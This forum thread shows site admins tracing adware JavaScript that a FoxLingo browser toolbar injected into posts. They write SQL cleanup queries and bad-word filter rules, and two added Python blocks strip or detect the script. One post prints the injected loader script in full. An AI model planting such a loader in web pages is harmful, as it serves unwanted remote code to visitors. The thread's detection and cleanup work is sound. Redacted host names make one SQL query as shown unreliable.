PilotPTK
(PilotPTK)
December 31, 2012, 5:36pm
43
I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…
PPtk
Ref: #.appears after URL. And unknown script inserted | WordPress.org
FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)
PilotPTK:
I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…
PPtk
Ref: #.appears after URL. And unknown script inserted | WordPress.org
FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)
Just gonna put it out there that I hate browser toolbars or any other “force it down your throat” crap that comes with the program you’re trying to install.
I DON’T WANT IT!
Likely you guys are right on this one.
sb56637
December 31, 2012, 5:40pm
45
PilotPTK:
suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKE '%javascript%')
obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts
PPtk
Thanks very much PPtk. For a website admin I am shockingly ignorant about SQL queries.
Could you please help me with a query in the comments table to replace all occurrences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.
PilotPTK
(PilotPTK)
December 31, 2012, 5:56pm
46
sb56637:
PilotPTK:
suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKE '%javascript%')
obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts
PPtk
Thanks very much PPtk. For a website admin I am shockingly ignorant about SQL queries.
Could you please help me with a query in the comments table to replace all occurrences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.
UPDATE [COMMENTS_TABLE] SET [COMMENT_TEXT]=REPLACE([COMMENT_TEXT], 'example.com', 'example.com') WHERE [COMMENT_TEXT] LIKE '%example.com%'
Again, replace [COMMENTS_TABLE] with the table name and [COMMENT_TEXT] with the column name where the actual post text is located.
PPtk
Don’t Do It! It’s not showing up correctly! Don’t Do what I Just said… Standby.
sb56637
December 31, 2012, 5:48pm
47
No worries, I didn’t run anything yet. What isn’t showing up correctly?
PilotPTK
(PilotPTK)
December 31, 2012, 5:51pm
48
There is “stuff” after the word REPLACE that isn’t showing up…
Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form
And you’ll see it in the quote… Just grab it from there and run it.
sb56637
December 31, 2012, 5:54pm
49
Ah, I see. Nice catch. You can enclose code segments in @ marks like this
so the filter system doesn’t modify it.
scaru
(scaru)
December 31, 2012, 5:56pm
50
But your @ marks didn't show up there. ;)
PilotPTK
(PilotPTK)
December 31, 2012, 5:58pm
51
Gotcha. I’m not used to Drupal. I tried enclosing it in [CODE] and [/CODE] tags, which didn’t work…
I updated the original post so that it’s correct for historical reference.
NightCrawl
(NightCrawl)
December 31, 2012, 6:01pm
52
This board could use a [code][/code] feature.. and an "ignorance" mode for that javascript stuff. :P
@<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//example.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>@
But @@ works.. kinda. Didn’t quite work on the admins post scaru quoted.
PilotPTK
(PilotPTK)
December 31, 2012, 6:04pm
53
To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.
scaru
(scaru)
December 31, 2012, 6:06pm
54
Couldn't he just add something more specific like "script id=" so that java code wouldn't work, but people could still say the word javascript.
PilotPTK
(PilotPTK)
December 31, 2012, 6:09pm
55
Yeah. I suppose. Who would want to say javascript (Bleh) though?
In most cases, javascript is the problem, not the solution.
sb56637
December 31, 2012, 6:12pm
56
The thing is, many of our users like to do beamshots with mouseover comparisons, which would also be eliminated.
scaru
(scaru)
December 31, 2012, 6:12pm
57
Oh, in that case (I use them too) maybe just block "foxlingo" to at least stop these ads.
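The three bad-word rules proposed in the posts above, compared with a structural check for `<script>` elements, as an added example that is not part of the original thread. The sample posts are constructed, and it is an assumption that the mouseover comparisons use inline `onmouseover` attributes.

```python
from html.parser import HTMLParser

# The three substring rules proposed in the thread.
SUBSTRING_RULES = ("javascript", "script id=", "foxlingo")


class ScriptFinder(HTMLParser):
    """Collects (id, src) for every <script> element in a post."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lower-cases tag and attribute names
            a = dict(attrs)
            self.scripts.append((a.get("id"), a.get("src")))


def substring_hits(post):
    """Which of the proposed bad-word rules would reject this post."""
    low = post.lower()
    return [rule for rule in SUBSTRING_RULES if rule in low]


def has_script_element(post):
    """Structural check: reject only posts that carry a real <script> element."""
    finder = ScriptFinder()
    finder.feed(post)
    return bool(finder.scripts)


# Constructed sample posts (not taken from the forum database).
POSTS = {
    "toolbar_injected": '<p>hi</p><script id="FoxLingoJs" type="text/javascript">// x</script>',
    "other_script": '<SCRIPT type="text/javascript" ID="OtherJs">// x</SCRIPT>',
    "mouseover": '<img src="a.jpg" onmouseover="this.src=\'b.jpg\'" onmouseout="this.src=\'a.jpg\'">',
    "discussion": "I think javascript is the problem, not the solution.",
}


def compare():
    """Map each sample post to (substring rules hit, structural verdict)."""
    return {name: (substring_hits(p), has_script_element(p)) for name, p in POSTS.items()}


if __name__ == "__main__":
    for name, verdict in compare().items():
        print(name, verdict)
```

Inline event handlers are executable too, so a filter that permits them for the mouseover feature still leaves that path open to whatever a poster or a toolbar puts in the attribute.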
PilotPTK
(PilotPTK)
December 31, 2012, 6:14pm
58
Looks like you did the update to example.com … How long did that update query take to run? How many records modified? Just curious…
sb56637
December 31, 2012, 6:21pm
59
Worked great, thanks! 25 records were modified.
So, after the two affected users are notified, I would like to remove the whole script. How can I do that with an SQL query? I’m sure many of those characters need to be escaped somehow. Here’s the original offending code: <script id="FoxLingoJs" type="text/javascript">// <![CDATA[!function(){try{var - Pastebin.com
Thanks a ton for the technical support PilotPTK!
PilotPTK
(PilotPTK)
December 31, 2012, 6:26pm
60
My pleasure sb,
Removing the entire offending code is a little more complex. I’d have to see exactly how it looks in the actual SQL return.
If it’s pointing to example.com now, it’s really pretty harmless… I’m not sure I’d even waste the time cleaning up those 25 posts…
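The cleanup asked about above, as an added example that is not part of the original thread: it copies each affected row to an evidence table, then strips the whole injected element, binding values as query parameters so the script's quotes and brackets need no escaping. It runs against an in-memory SQLite stand-in; the table and column names, the shortened script body and the `ads.invalid` host are assumptions.

```python
import re
import sqlite3

# Constructed sample of the injected block (hypothetical ad host, shortened body).
INJECTED = ('<script id="FoxLingoJs" type="text/javascript">// <![CDATA[\n'
            '!function(){var s=document.createElement("script");'
            's.src="//ads.invalid/snippet.js";}();\n// ]]></script>')

# Matches the whole <script id="FoxLingoJs"> ... </script> element, across newlines.
FOXLINGO_RE = re.compile(
    r'<script\b[^>]*\bid=["\']FoxLingoJs["\'][^>]*>.*?</script>',
    re.IGNORECASE | re.DOTALL)


def build_demo_db():
    """In-memory stand-in for the forum database (table/column names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments (cid INTEGER PRIMARY KEY, body TEXT)")
    db.execute("CREATE TABLE comments_evidence (cid INTEGER, body TEXT, saved_at TEXT)")
    rows = [(1, "Nice beamshots!"),
            (2, "Great light. " + INJECTED + " More text."),
            (3, '<img src="a.jpg" onmouseover="this.src=\'b.jpg\'">'),  # legitimate mouseover
            (4, INJECTED)]
    db.executemany("INSERT INTO comments VALUES (?, ?)", rows)
    db.commit()
    return db


def clean_comments(db):
    """Save affected rows as evidence, strip the injected element, return changed ids."""
    # The search term is a bound parameter, so nothing in it needs escaping.
    hits = db.execute("SELECT cid, body FROM comments WHERE body LIKE ? ORDER BY cid",
                      ("%FoxLingoJs%",)).fetchall()
    changed = []
    with db:  # one transaction: evidence copy and update succeed or fail together
        for cid, body in hits:
            cleaned = FOXLINGO_RE.sub("", body)
            if cleaned == body:
                continue  # mentions the string but carries no script element
            db.execute("INSERT INTO comments_evidence VALUES (?, ?, datetime('now'))",
                       (cid, body))
            db.execute("UPDATE comments SET body = ? WHERE cid = ?", (cleaned, cid))
            changed.append(cid)
    return changed


if __name__ == "__main__":
    db = build_demo_db()
    print("modified rows:", clean_comments(db))
```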
FlashPilot
(FlashPilot)
December 31, 2012, 7:53pm
61
LMAO! Very disturbing indeed! :bigsmile:
GREAT, GREAT (!) investigation PilotPTK!!!
May I humbly add:
devman’s prior post got me looking at adnxs.com
This resolved to http://www.appnexus.com … they claim (CAPS are in their original text) weebay, faceb00k and others as their clients
APPNEXUS IS TODAY’S MOST POWERFUL, OPEN AND CUSTOMIZABLE ADVERTISING TECHNOLOGY PLATFORM. ADVERTISING’S LARGEST AND MOST INNOVATIVE COMPANIES BUILD THEIR BUSINESSES ON APPNEXUS.
as well as
MAKING ADVERTISING A FORCE FOR GOOD
Going through their site, seems legitimate business but they’re really f&%$#round and - in our situation - way too oppressive.
Here’s some screen capture “analyses” of the problems here with the javascript… hope these can assist with cleaning